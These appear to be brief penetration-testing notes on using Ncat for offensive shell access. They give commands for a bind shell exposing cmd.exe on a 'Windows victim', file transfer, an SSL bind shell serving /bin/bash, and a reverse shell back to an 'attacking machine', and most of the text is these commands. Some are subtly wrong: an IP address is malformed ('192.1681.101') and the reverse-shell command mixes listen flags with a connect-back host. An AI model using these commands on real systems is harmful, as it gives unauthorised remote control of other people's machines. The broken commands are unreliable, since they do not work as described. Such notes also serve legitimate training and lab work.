Ncat

Ncat is similar to netcat, but provides some options that netcat doesn't contain. It belongs to the Nmap project.

To create a bind shell, in a Windows victim we neet to execute (-l for listening, -v for verbose output, -p to specify port, -n for not resolving via dns): ncat --exec cmd.exe -lvp 4444

And on the client machine (Kali) we could connect with telnet, for an unencrypted connection: telnet 192.168.1.100 4444

Just like in netcat, files can be transferred. To upload a file to a server, we need to execute in the server: ncat -lvp 4444 > receive.txt

An on the client: ncat 192.168.1.100 4444 < a.txt

With ncat we can establish encrypted connections with the --ssl option. For example, for a bind shell we execute on the target (192.168.1.100): ncat --exec /bin/bash --allow 192.1681.101 -vnl 4444 --ssl

And the client (192.168.1.101): ncat -v 192.168.1.100 4444 --ssl

Reverse shells are also possible, doing in the target (192.168.1.100): ncat --exec /bin/bash 192.168.1.101 -vnl 4444 --ssl

While we listen on our attacking machine (192.168.1.101): ncat -lvp 4444 --ssl